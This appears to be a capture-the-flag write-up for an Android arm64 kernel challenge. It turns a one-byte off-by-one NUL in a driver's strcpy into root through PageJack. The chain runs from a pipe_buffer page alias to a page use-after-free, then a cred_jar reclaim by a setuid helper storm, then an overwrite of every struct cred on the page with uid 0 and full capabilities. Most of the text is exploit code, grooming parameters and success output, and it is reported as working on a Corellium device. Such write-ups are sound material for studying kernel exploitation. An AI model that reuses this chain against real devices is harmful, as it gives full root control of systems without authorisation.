TL;DR
A one-byte off-by-one NUL in an Android kernel driver is leveraged into a
page-level UAF and then into root via a struct cred overwrite (PageJack). No
infoleak, no kernel address. Validated on the local QEMU image and ported to a
Corellium device.
Target : Linux 5.15.41 arm64, /dev/kern-net
Local : QEMU, nokaslr, uid mhl=1000
Device : Corellium (Android ranchu), KASLR on, SELinux enforcing, uid shell=2000
Flag : MHL{big_things_have_small_beginnings}
Vulnerability
The driver’s LOAD_MODEL_DATA ioctl copies a fixed 128-byte structure from
userland into a kernel buffer, then strcpys the description field:
struct model_metadata { // sizeof == 128
uint32_t framework_type; // 0x00
uint16_t model_version; // 0x04
uint16_t precision_bits; // 0x06
uint32_t input_shape[3]; // 0x08
uint32_t output_size; // 0x14
uint64_t weight_checksum; // 0x18
char model_desc[96]; // 0x20 .. 0x80
};
mdata = kmalloc(128, GFP_KERNEL_ACCOUNT); // -> kmalloc-cg-128
strcpy(mdata->model_desc, user->model_desc);
model_desc is 96 bytes and ends exactly at offset 128. Supplying 96 non-NUL
characters makes strcpy write the 96 bytes plus a terminating \0 at offset
128, a single NUL one byte past the object, onto byte 0 of the next cg-128
slot. The _ACCOUNT flag routes the allocation into the accounted kmalloc-cg-*
caches.
Relevant kernel configuration:
SLAB_FREELIST_RANDOMandSLAB_FREELIST_HARDENEDenabled (randomized object order, obfuscated freelist pointers).VMAP_STACKenabled (kernel stacks are vmalloc’d).INIT_ON_ALLOC/INIT_ON_FREEdisabled.- KASLR enabled but irrelevant: the exploit needs no infoleak.
- System V IPC disabled on Android (
msggetreturns ENOSYS), which rules out the classicmsg_msgroute.
The single NUL at offset 0 of a neighbour is too weak to corrupt a msg_msg
usefully inside cg-128, so we target a page instead of an object.
Target object: cross-page onto a pipe_buffer array
A resized pipe is backed by an array of pipe_buffer structs:
struct pipe_buffer { // sizeof = 40 B
struct page *page; // offset 0
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
After F_SETPIPE_SZ(2*PAGE) the array is 2 * 40 = 80 bytes and lands in
kmalloc-cg-96. Separately, every write into the pipe allocates a dedicated 4 KiB
data page (alloc_page, unmovable), whose pipe_buffer[0].page holds the only
reference.
A cg-128 slab page holds 4096 / 128 = 32 objects. The off-by-one NUL lands at
offset +128 of the mdata object, i.e. byte 0 of the next object. For objects
0..30 that next object is in the same page (same cache, useless). For object 31
(offset 0xf80), model_desc ends at 0xf80 + 0x20 + 96 = 0x1000, byte 0 of the
neighbouring page. A slab page belongs to a single cache, but two pages of
different caches can be physically adjacent: the buddy allocator can place a
cg-128 page right before a cg-96 page. We therefore groom so that a cg-128
page whose mdata is the last object is physically followed by a pipe_buffer
array page. The NUL then hits byte 0 of that page, the LSB of
pipe_buffer[0].page.


PageJack primitive
The kernel keeps a struct page descriptor for every physical page in a flat
array (vmemmap):
PFN N -> vmemmap[N] @ vmemmap_base + N * 0x40
Since sizeof(struct page) == 0x40, every valid struct page * has one of
{0x00, 0x40, 0x80, 0xC0} as its low byte. Clearing that low byte to 0x00
(ptr &= ~0xff) rounds the pointer down to a 0x100 boundary, i.e. pfn &= ~3:
| original LSB | net shift | target |
|---|---|---|
0x00 |
0 | no-op |
0x40 |
-0x40 | PFN - 1 |
0x80 |
-0x80 | PFN - 2 |
0xC0 |
-0xC0 | PFN - 3 |
In three cases out of four, pipe_buffer.page is shifted onto a different
struct page, describing a different physical page. With a dense pipe spray those
pages have consecutive PFNs, so the shifted pointer lands on a neighbouring pipe’s
data page. Two pipes (call them C and V) now reference the same page P, and P’s
refcount is still 1: the NUL rewrote a pointer, it never called get_page.

The pipe write primitive
Each pipe is given a full-page marker: a 4 KiB write where every 4-byte word is
the pipe index. Reading a pipe returns the marker of whatever page its
pipe_buffer[0].page currently points at, which makes the overlap detectable
entirely in userland.
To write into the dangling page later, the exploit uses tmp_page. When a pipe
buffer is fully drained, anon_pipe_buf_release caches its page into
pipe->tmp_page if page_count(page) == 1 (true for a slab page) instead of
freeing it. The next write() reuses tmp_page as a fresh buffer at offset 0 and
copies into the page. Note that the overlap detection (Step 3) reads 4 bytes from
pipe C, leaving its buffer at offset = 4: the read view is therefore shifted by
4 bytes from the physical page, while the tmp_page write restarts at physical
offset 0, exactly where the slab objects begin (0, 192, 384, …).
cred_jar and the buddy allocator
struct cred is allocated from a dedicated cred_jar cache. Slab caches are
isolated at the slab layer but share the same buddy allocator, so a page returned
to buddy by a cg-* cache can be reissued to cred_jar on its next refill.
struct cred on Linux 5.15 arm64 (verified at the gdb stub):
0x00 atomic_t usage (4 bytes, NOT atomic_long here)
0x04 kuid_t uid
0x08 kgid_t gid
0x0c suid 0x10 sgid
0x14 euid 0x18 egid
0x1c fsuid 0x20 fsgid
0x24 securebits
0x28 cap_inheritable 0x30 cap_permitted
0x38 cap_effective 0x40 cap_bset 0x48 cap_ambient
cred_jar geometry: order-0, object size 192, so a 4 KiB page hosts 21 cred
slots, with cpu_partial = 30, min_partial = 5.
Important Android detail: setting uid 0 is not enough. Without CAP_DAC_OVERRIDE
in cap_effective, opening the root-owned flag returns EACCES. The overwrite must
also fill the capability sets.
Reclaiming the page: the setuid storm
The textbook reclaim (a setuid loop to drain the freelist, then fork) is
unreliable on this target, for two measured reasons:
cred_jarkeeps a reservoir (cpu_partial = 30,min_partial = 5), so a cred allocation almost always finds a free slot and does not force a fresh slab onto P./proc/slabinfocannot observe the per-cpu freelist, so the drain target is not observable.fork/clonedoes not help: besides the cred it performs zero-filled order-0 allocations (COW page tables forfork, faulted stack pages forclone) that consume the pcp-hot page P and zero it. Combined with the reservoir, the cred lands in a free slot elsewhere while P is taken by one of those zeroing allocations. Waking workers by writing into a pipe fails for the same reason: the write allocates a pipe data page that grabs P.
The fix is a storm of pure cred allocations with no parasitic allocation in the post-free window:
fork256 helpers before the spray, so they do not inherit the spray pipe fds (their stacks and page tables are allocated well before the UAF). Each helper pins to CPU 0 and blocks on a control pipe.- After
close(V), wake them by closing the control pipe’s write end. The blockedreadreturns EOF, which allocates nothing. - Each helper calls
setuid(getuid()). That isprepare_creds, a pure cred allocation with no preceding stack or page-table allocation. In volume the storm crosses the slab boundary, a fresh slab is born on P, and fills with live creds. We observe P full: 21 cred objects, 8 id fields each = 168 words equal to our uid.

Exploitation
The exploit is a chain of small functions:
int main(void) {
setup(); // open device, pipes, rlimit, shared claim flag
fork_helpers(); // 256 setuid helpers, BEFORE the spray
pin_cpu0();
int n = spray_pipes(); // pipe_buffer arrays + a marked page each
punch_holes(n); // free every other pipe
int C, V;
if (!pagejack(n, &C, &V)) return 1; // poison until an alias is found
page_uaf(V); // close(V): put_page(P) 1 -> 0
char *page = calloc(1, PG);
int hit = reclaim_cred_jar(C, page); // setuid storm, then read P back
if (!hit) { pause(); return 1; }
overwrite_creds(C, page); // patch every cred on P (uid 0 + caps)
win(); // wake helpers; a rooted one prints the flag
pause(); // never close pipe C (no double put_page on P)
}
setup() raises RLIMIT_NOFILE (each pipe uses two fds) and pin_cpu0() pins to
CPU 0 (per-cpu slab/pcp locality). The rest is detailed below.
Step 1: spray_pipes() (pipe arrays + full-page markers)
for (n = 0; n < 4096; n++) {
pipe(pp[n]);
fcntl(pp[n][1], F_SETPIPE_SZ, 2*PG);
for (k = 0; k < PG/4; k++) ((int*)pg)[k] = n; // marker = index
write(pp[n][1], pg, PG);
}
Step 2: punch_holes() (checkerboard)
for (i = 0; i < n; i += 2) { close(pp[i][0]); close(pp[i][1]); pp[i][0] = -1; }
Freeing one in two keeps every freed page bordered by survivors, so an mdata
landing at the end of its slab page overflows into a pipe_buffer page.
Step 3: pagejack() (poison and locate the overlap)
while (np < 3072 && C < 0) {
for (i = 0; i < 128; i++) knet_poison(); // mdata, NUL at +128
np += 128;
for (i = 1; i < n; i += 2) { // userland detection
int v = -1;
if (read(pp[i][0], &v, 4) == 4 && v != i && (v & 1) && pp[v][0] >= 0) {
C = i; V = v; break; // C reads V's marker
}
}
}
C is the corrupted pipe (its .page was shifted onto V’s page P); V is the
legitimate owner. The partial read leaves the buffer alive, so P is not released.
Step 4: page_uaf() (free the shared page)
close(pp[V][0]); close(pp[V][1]); // put_page(P): refcount 1 -> 0
P returns to buddy while pipe C still points at it: page-level UAF.
Step 5: reclaim_cred_jar() (the setuid storm)
close(ctl[1]); // EOF wakes the 256 pre-forked helpers
usleep(150*1000); // each helper: setuid(getuid()) -> fresh cred_jar slab on P
Step 6: overwrite_creds() (read P and overwrite every cred)
while ((r = read(pp[C][0], t+pos, PG-pos)) > 0) pos += r; // drain -> tmp_page=P
// rebuild the page (preserve each cred's kernel pointers), patch every cred:
for (m = 4; m < PG; m++) wb[m] = t[m-4]; // read view is +4
for (base = 0; base+176 <= PG; base += 192) {
*(int*)(wb+base) = 0x4000; // usage (large, never 0)
memset(wb+base+0x04, 0, 0x20); // uid..fsgid = 0
memset(wb+base+0x28, 0xff, 0x20); // caps inherit/perm/eff/bset = full
}
write(pp[C][1], wb, PG); // tmp_page == P -> rewrite the page

Step 7: win() (read the flag once)
close(ctl2[1]); // second EOF: any helper whose live cred is on P is now root
Each rooted helper (uid 0 + full caps) can open /data/vendor/secret/flag.txt,
but only the first one reports: it claims a shared flag with
__sync_bool_compare_and_swap(claimed, 0, 1) and writes the flag back to the
parent through a result pipe, so the flag is printed exactly once. The parent must
not exit: closing pipe C would call put_page on a page now owned by cred_jar
and oops the kernel.
[+] /dev/kern-net opened
[+] 256 setuid helpers pre-forked
[+] sprayed 4096 pipes
[+] checkerboard holes punched
[+] PageJack: pipe 3879 aliases pipe 3877's page P
[+] page UAF: P freed, pipe C dangling
[+] cred_jar reclaim: P is a cred page (168 uid fields)
[+] every cred on P overwritten (uid 0 + full caps)
[+] ROOT FLAG = MHL{big_things_have_small_beginnings}
Tuning rationale
| Parameter | Value | Reason |
|---|---|---|
model_desc |
96 ‘A’ | Forces strcpy to write the NUL at offset 128, byte 0 of the neighbour. |
| Vulnerable slot | last of its page | Only object 31 sends the NUL across the page boundary into a different cache. |
| Free step | 1 in 2 | Keeps freed pages bordered by survivors so overflows hit a pipe_buffer. |
| OOB byte | 0x00 |
Keeps struct page * aligned to 0x40; pfn &= ~3 lands on a neighbour. |
| Helpers | 256, pre-forked | Pure setuid cred allocations with no zeroing alloc to steal P. |
| Wake | close (EOF) | Writing to a pipe would allocate a page that grabs P. |
usage |
0x4000 |
Large and non-zero, so the patched cred is never freed. |
| Overwrite | whole page + caps | Patches all 21 creds (any may be live) and adds CAP_DAC_OVERRIDE. |
| Closing pipe C | never | Releasing it would put_page a cred_jar page. |
References
- PageJack, Black Hat USA 2024 by Qian: page-level UAF technique.
- Reviving exploits against
cred_struct, willsroot: https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html - LACTF 2025 “messenger” writeup (same PageJack + cred_jar technique on a 3-byte OOB), kiperz.dev.
- corCTF 2025 “corphone” (Android pipe page-UAF to PTE hijack / SELinux off), u1f383.github.io.